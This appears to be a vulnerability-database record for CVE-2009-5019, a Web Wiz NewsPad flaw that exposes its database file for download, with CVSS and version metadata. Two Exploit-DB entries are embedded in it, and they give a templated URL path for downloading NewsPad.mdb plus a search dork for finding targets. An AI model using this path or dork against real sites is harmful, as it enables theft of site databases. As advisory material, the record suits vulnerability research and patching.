ID CVE-2009-5019Type cveReporter cve@mitre.orgModified 2017-08-17T01:31:00
Description
Web Wiz NewsPad stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/NewsPad.mdb.
{"id": "CVE-2009-5019", "bulletinFamily": "NVD", "title": "CVE-2009-5019", "description": "Web Wiz NewsPad stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/NewsPad.mdb.", "published": "2010-12-01T16:06:00", "modified": "2017-08-17T01:31:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-5019", "reporter": "cve@mitre.org", "references": ["http://packetstormsecurity.org/files/view/84294/webwiznewspad-disclose.txt", "https://exchange.xforce.ibmcloud.com/vulnerabilities/55043", "http://www.exploit-db.com/exploits/10637", "http://www.exploit-db.com/exploits/15544"], "cvelist": ["CVE-2009-5019"], "type": "cve", "lastseen": "2019-05-29T18:10:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "8bae9825e5456319be6db264e32190fa"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "dc87a89b3ede7adcac9c5f92bb8eb58c"}, {"key": "cpe23", "hash": "a99c7b057c21b9c7b9efc202a5e697ae"}, {"key": "cvelist", "hash": "13ccdb200be753114e0f026b6368241d"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "f30109dfdbfbf783c0b61792a6b2c20a"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "fa12e087f68642fcaefafba0d4583885"}, {"key": "description", "hash": "979f98e3ffd35e5e93243c458406b7fc"}, {"key": "href", "hash": "d8f30b1253f8138ae38b69c34a25d1d0"}, {"key": "modified", "hash": "379d351812b3525b5f6e71572a16d29f"}, {"key": "published", "hash": "94ed411d936c864526b14a9bfb0b25cb"}, {"key": "references", "hash": "f3e49e9504cf4055c4c67b048adae628"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "e14deec2d1dcfea06f724c04f72494d8"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "25a359dce05e918a8d280f70fc997292c2a901565d5f408133ef4f9caaa1fc77", "viewCount": 1, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2019-05-29T18:10:02"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:10637", "EDB-ID:15544"]}], "modified": "2019-05-29T18:10:02"}, "vulnersScore": 5.6}, "objectVersion": "1.3", "cpe": ["cpe:/a:webwiz:web_wiz_newspad:1.0", "cpe:/a:webwiz:web_wiz_newspad:1.03", "cpe:/a:webwiz:web_wiz_newspad:1.01", "cpe:/a:webwiz:web_wiz_newspad:1.02"], "affectedSoftware": [{"name": "webwiz web_wiz_newspad", "operator": "eq", "version": "1.01"}, {"name": "webwiz web_wiz_newspad", "operator": "eq", "version": "1.0"}, {"name": "webwiz web_wiz_newspad", "operator": "eq", "version": "1.03"}, {"name": "webwiz web_wiz_newspad", "operator": "eq", "version": "1.02"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:webwiz:web_wiz_newspad:1.02:*:*:*:*:*:*:*", "cpe:2.3:a:webwiz:web_wiz_newspad:1.03:*:*:*:*:*:*:*", "cpe:2.3:a:webwiz:web_wiz_newspad:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:webwiz:web_wiz_newspad:1.01:*:*:*:*:*:*:*"], "cwe": ["CWE-264"]}
{"exploitdb": [{"lastseen": "2016-02-01T12:53:07", "bulletinFamily": "exploit", "description": "Web Wiz NewsPad Database Disclosure Vulnerability. CVE-2009-5019. Webapps exploit for asp platform", "modified": "2009-12-24T00:00:00", "published": "2009-12-24T00:00:00", "id": "EDB-ID:10637", "href": "https://www.exploit-db.com/exploits/10637/", "type": "exploitdb", "title": "Web Wiz NewsPad Database Disclosure Vulnerability", "sourceData": "==============================================================================\r\n _ _ _ _ _ _\r\n / \\ | | | | / \\ | | | |\r\n / _ \\ | | | | / _ \\ | |_| |\r\n / ___ \\ | |___ | |___ / ___ \\ | _ |\r\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\r\n\r\n\r\n==============================================================================\r\n [\u00bb] ~ Note : Some sites may change the path of the \"database/NewsPad.mdb\" cause the vulnerability not work\r\n==============================================================================\r\n [\u00bb] Web Wiz NewsPad Remote Database Disclosure Vulnerability\r\n==============================================================================\r\n\r\n [\u00bb] Script: [ Web Wiz NewsPad ]\r\n [\u00bb] Language: [ ASP ]\r\n [\u00bb] Site page: [ Web Wiz NewsPad - Free eNewsletter Software Download ]\r\n [\u00bb] Download: [ http://www.webwizguide.com/webwiznewspad/downloads.asp ]\r\n [\u00bb] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]\r\n [\u00bb] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]\r\n [\u00bb] My Home: [ HackTeach.Org , Islam-Attack.Com ]\r\n\r\n###########################################################################\r\n\r\n===[ Exploit ]===\r\n\r\n [\u00bb] http://[target].com/[path]/database/NewsPad.mdb\r\n\r\nAuthor: ViRuSMaN <-\r\n\r\n###########################################################################\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/10637/"}, {"lastseen": "2016-02-01T22:02:14", "bulletinFamily": "exploit", "description": "Web Wiz NewsPad Express Edition 1.03 Database File Disclosure Vulnerability. CVE-2009-5019. Webapps exploit for asp platform", "modified": "2010-11-15T00:00:00", "published": "2010-11-15T00:00:00", "id": "EDB-ID:15544", "href": "https://www.exploit-db.com/exploits/15544/", "type": "exploitdb", "title": "Web Wiz NewsPad Express Edition 1.03 Database File Disclosure Vulnerability", "sourceData": "=============================================================\r\nNewsPad Database Download Vulnerability\r\n\r\n=============================================================\r\n\r\n#############################################################\r\n\r\n#\r\n\r\n# Exploit Title: NewsPad Database Download Vulnerability\r\n\r\n# Date: 15/11/2010\r\n\r\n# Author: keracker\r\n\r\n# Software Link: www.webwiz.co.uk/webwiznewspad/downloads.asp\r\n\r\n# Tested on: windows\r\n\r\n# dork : \"NewsPad Admin Login\"\r\n\r\n# Contact: h4m3d_68@yahoo.com ~ Black.hat.tm@gmail.com\r\n\r\n#\r\n\r\n############################################################\r\n\r\nexploit # www.target.com/path/database/NewsPad.mdb\r\n\r\n\r\n############################################################\r\n\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n\r\n WE ARE BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/15544/"}]}
